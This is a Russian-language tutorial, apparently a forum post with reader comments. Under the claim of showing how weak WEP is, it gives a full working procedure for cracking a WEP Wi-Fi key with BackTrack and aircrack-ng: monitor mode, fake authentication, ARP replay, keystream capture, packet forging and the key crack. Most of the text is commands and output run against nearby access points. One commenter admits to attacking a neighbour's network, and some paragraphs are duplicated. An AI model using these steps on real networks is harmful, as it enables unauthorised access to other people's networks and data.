Инструкция показывающая какой не эффективный способ шифровать WiFi с помощью WEP.
Нам понадобиться этот LiveCD http://www.backtrack-linux.org/downloads/
После того как его скачали, записали на болванку, перезагружаем компьютер и загружаемся с этого диска. Когда появиться вопрос Boot linux,нажимаем ентер, после будет красный экран с текстом, там выбираем самый первый вариант. когда появиться чёрный экран с root@root: пишем там startx, ждём загрузки OS как на картинке.
Далее сама инструкция!
Текст написанный таким способом, это команды в консоль, которые не обходимо написать самому
Такой текст - выделение различных параметров
Итак приступим:
открываем консоль, и переводим нужную карточку в режим монитора
root@root:~# airmon-ng
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
wlan1 Atheros AR9287 ath9k - [phy1]
Будем переводить wlan1 Atheros AR9287
если бы переводили Broadcom то писали бы wlan0
если бы переводили Broadcom то писали бы wlan0
root@root:~#airmon-ng start wlan1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2752 dhclient3
2816 dhclient3
Process with PID 2816 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
wlan1 Atheros AR9287 ath9k - [phy1]
(monitor mode enabled on mon0)
Карточка успешно перевелась в режим монитора, хотя немного поругалась на dhcp демона
Теперь делаем поиск сети, и наш новый интерфейс mon0
Чтобы остановить поиск нажимаем ctrl+C
Теперь делаем поиск сети, и наш новый интерфейс mon0
Чтобы остановить поиск нажимаем ctrl+C
root@root:~# airodump-ng --encrypt wep mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER ESSID
00:0B:6B:15:90:A2 -79 4 1 0 1 54 . WEP WEP AxessMV400
54:E6:FC:B2:8C:AC -80 7 0 0 1 54 . WEP WEP malishnya
00:25:9C:21:49:61 -81 13 0 0 11 54 . WEP WEP linksys
Далее выбираем нужную точку и начинаем собирать данные в файл file1 - -w file1
Сбор данных следует производить на том же канале, который показан в графе CH, в нашем случае это первый канал, поэтому указываем -c 1, в --bssid указываем BSSID нужной точки, он виден в окне поиска
Сбор данных следует производить на том же канале, который показан в графе CH, в нашем случае это первый канал, поэтому указываем -c 1, в --bssid указываем BSSID нужной точки, он виден в окне поиска
root@root:~# airodump-ng –c 1 --bssid 00:0B:6B:15:90:A2 -w file1 mon0
[CH 1 ][ Elapsed: 4 s ][ 2011-11-27 16:53
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0B:6B:15:90:A2 -80 44 32 0 0 1 54 . WEP WEP AxessMV400
BSSID STATION PWR Rate Lost Packets Probes
Оставляем сбор данных работать, и открываем новое окно консоли. Там делаем проверку на доступ к точке, в поле -а указываем тот же BSSID что и в прошлый раз
root@root:~# aireplay-ng -1 0 -a 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:28:51 Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
16:28:51 Sending Authentication Request (Open System) [ACK]
16:28:51 Authentication successful
16:28:51 Sending Association Request [ACK]
Если видим что "Authentication successful" значит точка открыта, иногда с первого раза такого ответа нет, стоит попробовать ещё пару раз выполнить проверку ( просто нажать стрелочку вниз и будет та же команда)
После того как всё прошло успешно, выполняем генерацию ARP пакетов, для получения векторов. -b пишем наш BSSID. Если всё идёт успешно, то открываем ту консоль где был сбор,и смотрим в поле Data число будет увеличиваться, если всё так, то переходим к "Подбору пароля" в самом низу этой инструкции.
После того как всё прошло успешно, выполняем генерацию ARP пакетов, для получения векторов. -b пишем наш BSSID. Если всё идёт успешно, то открываем ту консоль где был сбор,и смотрим в поле Data число будет увеличиваться, если всё так, то переходим к "Подбору пароля" в самом низу этой инструкции.
root@root:~# aireplay-ng -3 -b 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:29:28 Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
Saving ARP requests in replay_arp-1127-162928.cap
You should also start airodump-ng to capture replies.
97617 packets (got 0 ARP requests and 5 ACKs), sent 0 packets...(0 pps)
В случае если генерация не успешна - "97617 packets (got 0 ARP requests and 5 ACKs), sent 0 packets...(0 pps)" после того как было получено 97617 пакетов, это значит что точка не отдала ни одного ARP пакета и aireplay-ng не смог ничего отправит. Останавливаем генерацию нажатием ctrl+C. Далее Собирём ARP пакет в ручную. Первым шагом будет генерация ACK, -а как обычно наш BSSID
root@root:~# aireplay-ng -1 100 -a 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:28:51 Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
16:28:51 Sending Authentication Request (Open System) [ACK]
16:28:51 Authentication successful
16:28:51 Sending Association Request [ACK]
16:28:51 Association successful :-) (AID: 1)
…
Оставляем генерацию работать, и открываем новую консоль. Начинаем ловить keystream из которого потом будем собирать ARP пакет.-b наш BSSID
root@root:~# aireplay-ng -5 -b 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:43:22 Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
16:43:22 Waiting for a data packet...
Read 86524 packets...
Size: 187, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:0B:6B:15:90:A2
Dest. MAC = 01:00:5E:40:98:8F
Source MAC = 00:12:F0:3A:7D:49
0x0000: 0842 0000 0100 5e40 988f 000b 6b15 90a2 .B....^@....k...
0x0010: 0012 f03a 7d49 6050 00fc 0e00 9dc4 ea80 ...:}I`P........
0x0020: d914 0290 46af b9c5 7ce6 9ee2 cd37 3ffe ....F...|....7?.
0x0030: 3191 a2ef b221 a4f5 27bf 08c4 5047 64b3 1....!..'...PGd.
0x0040: 6619 806a 9890 2a17 1693 b902 6e2f 7770 f..j..*.....n/wp
0x0050: f019 645b 1d9a c764 a419 34c6 2843 7d60 ..d[...d..4.(C}`
0x0060: fb8e 3474 d8d1 abc5 4773 c22d 17bc df17 ..4t....Gs.-....
0x0070: ad03 9afc 82af 714b d1fe b644 e284 1880 ......qK...D....
0x0080: 0506 f7fb e29b e95a c654 1437 2f0b 69e9 .......Z.T.7/.i.
0x0090: edb4 9e94 ea7e 3a72 28e7 8772 9af0 0de6 .....~:r(..r....
0x00a0: e92d 888e 2564 0e2b 49cb d6c5 e80b 664b .-..%d.+I.....fK
0x00b0: 1083 d9e3 e567 f205 f78d ac .....g.....
Ловим этот самый пакет, пока не появиться вопрос "Use this packet?" В ответ мы нажимаем "y"
Use this packet ? y
Saving chosen packet in replay_src-1127-164553.cap
16:46:06 Data packet found!
16:46:06 Sending fragmented packet
16:46:06 Got a disassociation packet!
16:46:11 Not enough acks, repeating...
16:46:11 Sending fragmented packet
16:46:11 Got RELAYED packet!!
16:46:11 Trying to get 384 bytes of a keystream
16:46:12 Not enough acks, repeating...
16:46:20 Trying to get 1500 bytes of a keystream
16:46:20 Got RELAYED packet!!
Saving keystream in fragment-1127-164620.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Всё, keystream пойман и сохранён в "fragment-1127-164620.xor"
Далее мы создаём свой ARP пакет. -a наш BSSID; -y имя xor файла, в нашем случаее это fragment-1127-164620.xor; -w имя файла с нашим ARP пакетом - arpme
Далее мы создаём свой ARP пакет. -a наш BSSID; -y имя xor файла, в нашем случаее это fragment-1127-164620.xor; -w имя файла с нашим ARP пакетом - arpme
root@root:~# packetforge-ng -0 -a 00:0B:6B:15:90:A2 -h FF:FF:FF:FF:FF:FF -k 192.168.1.1 -l 192.168.1.101 -y fragment-1127-164620.xor -w arpme
Wrote packet to: arpme
После того как пакет создан, отправляем его на точку и ждём IV вектора. -r имя файла с нашим ARP пакетом "arpme"; -b наш BSSID
root@root:~# aireplay-ng -3 -r arpme -b 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:47:19 Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
Saving ARP requests in replay_arp-1127-164719.cap
You should also start airodump-ng to capture replies.
320110 packets (got 73991 ARP requests and 31816 ACKs), sent 84532 packets...(500 pps)
Как видно в данный момент, генерация прошла успешно, и точка начала отдавать вектора "(got 73991 ARP requests and 31816 ACKs), sent 84532 packets..." Для проверки переключитесь на окно сбора данных и обратите внимание, что поле Data стало заполнятся.
Далее делаем подбор пароля. -n это глубина шифрования, бывает 64;128;152;256;512, но обычно используеться 64 или 128. -b наш BSSID. В конце команды указываем наш файл file1 и добавляем к нему -01.cap, в итоге получается file1-01.cap
Подбор будет происходит до тех пор пока не подберёт правильный ключ, если векторов мало то aircrack будет ждать следующие 5 тысяч векторов, и повторит подбор. Что бы остановить подбор и поменять глубину шифрования, нажимаем ctrl+C
Далее делаем подбор пароля. -n это глубина шифрования, бывает 64;128;152;256;512, но обычно используеться 64 или 128. -b наш BSSID. В конце команды указываем наш файл file1 и добавляем к нему -01.cap, в итоге получается file1-01.cap
Подбор будет происходит до тех пор пока не подберёт правильный ключ, если векторов мало то aircrack будет ждать следующие 5 тысяч векторов, и повторит подбор. Что бы остановить подбор и поменять глубину шифрования, нажимаем ctrl+C
root@root:~# aircrack-ng -n 128 -b 00:0B:6B:15:90:A2 file1-01.cap
Opening ne1-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 18625 ivs.
Aircrack-ng 1.1 r1904
[00:00:02] Tested 17019 keys (got 18266 IVs)
KB depth byte(vote)
0 5/ 6 14(23296) AC(22528) D6(22528) 61(22272) 50(22016) 69(22016) B9(22016)
1 0/ 1 08(31488) 50(26624) E9(25344) 47(23808) EF(23552) 75(23296) 9F(23040)
2 0/ 13 B5(25088) 0E(24832) 37(24320) A0(23040) C4(23040) 5F(22528) 9E(22528)
3 9/ 13 DC(22528) 6F(22272) C1(22272) D4(22272) 11(22016) 42(22016) 68(22016)
4 0/ 17 4B(24832) 8D(23552) F2(23552) 38(23296) 3B(23296) 54(23296) 5A(23296)
KEY FOUND! [ 14:08:B5:03:4B ]
Decrypted correctly: 100%
root@root:~#
Ну вот и всё, ключ получен, для входа на точку пишем его без двоеточий и большими буквами
а скачивать не наказуемо? или тут все, все покупают
Но способ рабочий. Я так 4 года назад, пытаясь поломать соседскую, собственную сетку взломал...